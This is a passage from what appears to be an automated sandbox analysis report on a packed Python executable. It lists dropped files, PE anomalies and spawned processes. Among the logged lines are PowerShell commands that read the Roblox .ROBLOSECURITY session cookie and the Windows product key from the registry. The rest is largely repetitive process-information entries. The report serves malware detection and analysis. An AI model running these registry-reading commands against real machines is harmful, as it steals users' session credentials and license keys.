              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: e45AiBoV6X.exe, 00000001.00000002.1991624093.00007FFDFB3F5000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: e45AiBoV6X.exe, 00000001.00000002.1995817192.00007FFE10301000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.pdbhP source: powershell.exe, 00000025.00000002.1843488107.0000029680385000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: e45AiBoV6X.exe, 00000001.00000002.1989811289.00007FFDFAFEC000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: e45AiBoV6X.exe, e45AiBoV6X.exe, 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmp
              Source: e45AiBoV6X.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: e45AiBoV6X.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: e45AiBoV6X.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: e45AiBoV6X.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: e45AiBoV6X.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFB354460 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFB354460
              Source: libcrypto-1_1.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x110586
              Source: libffi-7.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x9bb1
              Source: python310.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x170f8b
              Source: _ctypes.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0xe78a
              Source: unicodedata.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x5531f
              Source: e45AiBoV6X.exe Static PE information: real checksum: 0x5e31e3 should be: 0x5e8567
              Source: _bz2.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x174bf
              Source: _ssl.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x1721f
              Source: sqlite3.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x9ae0f
              Source: libssl-1_1.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x3d34c
              Source: bohkan2x.dll.44.dr Static PE information: real checksum: 0x0 should be: 0x1059a
              Source: _queue.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0xbdb3
              Source: _socket.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0xf3db
              Source: _decimal.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x28949
              Source: _hashlib.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0xc47c
              Source: select.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x12cec
              Source: _lzma.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x213c2
              Source: _sqlite3.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x1ae1a
              Source: libffi-7.dll.0.dr Static PE information: section name: UPX2
              Source: VCRUNTIME140.dll.0.dr Static PE information: section name: _RDATA
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEEA2F5 push rsp; retf 1_2_00007FFDFAEEA2F6
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE92F4 push r10; retf 1_2_00007FFDFAEE9360
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE6C31 push r10; ret 1_2_00007FFDFAEE6C33
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE9C12 push rsp; retf 1_2_00007FFDFAEE9C13
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE91B3 push rdi; iretd 1_2_00007FFDFAEE91B5
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEEA174 push rsp; ret 1_2_00007FFDFAEEA175
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE6F42 push r12; ret 1_2_00007FFDFAEE6F5A
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE8F0E push r12; ret 1_2_00007FFDFAEE8F35
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE6EE0 push r12; ret 1_2_00007FFDFAEE6EFE
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE6EC6 push r10; retf 1_2_00007FFDFAEE6EC9
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE6EAB push rsi; ret 1_2_00007FFDFAEE6EAC
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE6E9C push rsp; iretd 1_2_00007FFDFAEE6E9D
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE8E76 push rbp; iretq 1_2_00007FFDFAEE8E77
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE77FA push rsi; ret 1_2_00007FFDFAEE7831
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE6F9D push r10; ret 1_2_00007FFDFAEE6FB0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE8F63 push r12; iretd 1_2_00007FFDFAEE8F7A
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE6F64 push r8; ret 1_2_00007FFDFAEE6F6C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE6D06 push r12; ret 1_2_00007FFDFAEE6D08
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE6CFA push rdx; ret 1_2_00007FFDFAEE6D01
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE6CDC push r8; ret 1_2_00007FFDFAEE6CE9
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEEA4B9 push rdx; ret 1_2_00007FFDFAEEA510
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE6E54 push rdi; iretd 1_2_00007FFDFAEE6E56
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE6E0B push rsp; ret 1_2_00007FFDFAEE6E13
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE85B7 push r12; ret 1_2_00007FFDFAEE85F3
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE9D95 push rsp; iretq 1_2_00007FFDFAEE9D96
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 1_2_00007FFDFAEE856C push rbp; retf 1_2_00007FFDFAEE8585
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD9ACFD2A5 pushad ; iretd 6_2_00007FFD9ACFD2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD9AE100BD pushad ; iretd 6_2_00007FFD9AE100C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD9AE1862D push ebx; ret 6_2_00007FFD9AE186CA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD9AE1861D push ebx; ret 6_2_00007FFD9AE1862A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD9AEE9266 push esi; ret 6_2_00007FFD9AEE9267
              Source: initial sample Static PE information: section name: UPX0
              Source: initial sample Static PE information: section name: UPX1
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73802\_lzma.pyd
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73802\_socket.pyd
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73802\select.pyd
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73802\VCRUNTIME140.dll
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73802\python310.dll
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73802\libssl-1_1.dll
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73802\sqlite3.dll
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73802\_sqlite3.pyd
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73802\_ssl.pyd
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73802\_queue.pyd
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73802\_bz2.pyd
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73802\_decimal.pyd
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73802\libffi-7.dll
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73802\unicodedata.pyd
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73802\_hashlib.pyd
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73802\libcrypto-1_1.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.dll
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73802\_ctypes.pyd

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 0_2_00007FF6FB1E50B0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF6FB1E50B0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
